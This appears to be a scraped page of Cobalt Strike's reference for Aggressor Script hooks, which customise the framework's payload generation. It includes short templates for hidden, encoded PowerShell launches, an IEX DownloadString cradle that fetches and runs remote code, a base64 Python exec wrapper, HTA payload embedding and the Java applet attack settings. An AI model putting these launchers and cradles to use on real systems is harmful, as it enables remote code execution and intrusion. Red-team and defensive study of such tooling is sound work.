Hooks allow Aggressor Script to intercept and change Cobalt Strike behavior.
Format shellcode before it's placed on the HTML page generated to serve the Signed or Smart Applet Attacks.
https://www.cobaltstrike.com/help-java-signed-applet-attack
This hook is demonstrated in the Applet Kit. The Applet Kit is available via the Cobalt Strike Arsenal (Help -> Arsenal).
set APPLET_SHELLCODE_FORMAT { return base64_encode($1); }
Control the EXE and DLL generation for Cobalt Strike.
$1
- the artifact file (e.g., artifact32.exe)$2
- shellcode to embed into an EXE or DLLThis hook is demonstrated in the Artifact Kit:
https://www.cobaltstrike.com/help-artifact-kit
Controls the content of the HTML Application User-driven (EXE Output) generated by Cobalt Strike.
$1
- the EXE data$2
- the name of the .exeThis hook is demonstrated in the Resource Kit:
https://www.cobaltstrike.com/help-resource-kit
set HTMLAPP_EXE { local('$handle $data'); $handle = openf(script_resource("template.exe.hta")); $data = readb($handle, -1); closef($handle); $data = strrep($data, '##EXE##', transform($1, "hex")); $data = strrep($data, '##NAME##', $2); return $data; }
Controls the content of the HTML Application User-driven (PowerShell Output) generated by Cobalt Strike.
$1
- the PowerShell command to runThis hook is demonstrated in the Resource Kit:
https://www.cobaltstrike.com/help-resource-kit
set HTMLAPP_POWERSHELL { local('$handle $data'); $handle = openf(script_resource("template.psh.hta")); $data = readb($handle, -1); closef($handle); # push our command into the script return strrep($data, "%%DATA%%", $1); }
Change the form of the powershell comamnd run by Cobalt Strike's automation. This affects jump psexec_psh, powershell, and [host] -> Access -> One-liner.
$1
- the PowerShell command to run.$2
- true|false the command is run on a remote target.This hook is demonstrated in the Resource Kit:
https://www.cobaltstrike.com/help-resource-kit
set POWERSHELL_COMMAND { local('$script'); $script = transform($1, "powershell-base64"); # remote command (e.g., jump psexec_psh) if ($2) { return "powershell -nop -w hidden -encodedcommand $script"; } # local command else { return "powershell -nop -exec bypass -EncodedCommand $script"; } }
A hook used by the resource kit to compress a PowerShell script. The default uses gzip and returns a deflator script.
This hook is demonstrated in the Resource Kit:
https://www.cobaltstrike.com/help-resource-kit
$1
- the script to compressChange the form of the PowerShell download cradle used in Cobalt Strike's post-ex automation. This includes jump winrm|winrm64, [host] -> Access -> One Liner, and powershell-import.
$1
- the URL of the (localhost) resource to reachThis hook is demonstrated in the Resource Kit:
https://www.cobaltstrike.com/help-resource-kit
set POWERSHELL_DOWNLOAD_CRADLE { return "IEX (New-Object Net.Webclient).DownloadString(' $+ $1 $+ ')"; }
Set the service name used by jump psexec|psexec64|psexec_psh and psexec.
set PSEXEC_SERVICE { return "foobar"; }
Compress a Python script generated by Cobalt Strike.
$1
- the script to compressThis hook is demonstrated in the Resource Kit:
https://www.cobaltstrike.com/help-resource-kit
set PYTHON_COMPRESS { return "import base64; exec base64.b64decode(\"" . base64_encode($1) . "\")"; }
Control the format of the VBS template used in Cobalt Strike.
This hook is demonstrated in the Resource Kit:
https://www.cobaltstrike.com/help-resource-kit
$1
- the shellcode to inject and runControls the content of the HTML Application User-driven (EXE Output) generated by Cobalt Strike.
$1
- the EXE data$2
- the name of the .exeThis hook is demonstrated in the Resource Kit:
https://www.cobaltstrike.com/help-resource-kit
set HTMLAPP_EXE { local('$handle $data'); $handle = openf(script_resource("template.exe.hta")); $data = readb($handle, -1); closef($handle); $data = strrep($data, '##EXE##', transform($1, "hex")); $data = strrep($data, '##NAME##', $2); return $data; }
Specify the MAIN class of the Java Signed Applet Attack.
https://www.cobaltstrike.com/help-java-signed-applet-attack
This hook is demonstrated in the Applet Kit. The Applet Kit is available via the Cobalt Strike Arsenal (Help -> Arsenal).
set SIGNED_APPLET_MAINCLASS { return "Java.class"; }
Specify a Java Applet file to use for the Java Signed Applet Attack.
https://www.cobaltstrike.com/help-java-signed-applet-attack
This hook is demonstrated in the Applet Kit. The Applet Kit is available via the Cobalt Strike Arsenal (Help -> Arsenal).
set SIGNED_APPLET_RESOURCE { return script_resource("dist/applet_signed.jar"); }
Specify the MAIN class of the Java Smart Applet Attack.
https://www.cobaltstrike.com/help-java-smart-applet-attack
This hook is demonstrated in the Applet Kit. The Applet Kit is available via the Cobalt Strike Arsenal (Help -> Arsenal).
set SMART_APPLET_MAINCLASS { return "Java.class"; }
Specify a Java Applet file to use for the Java Smart Applet Attack
https://www.cobaltstrike.com/help-java-smart-applet-attack
This hook is demonstrated in the Applet Kit. The Applet Kit is available via the Cobalt Strike Arsenal (Help -> Arsenal).
set SMART_APPLET_RESOURCE { return script_resource("dist/applet_rhino.jar"); }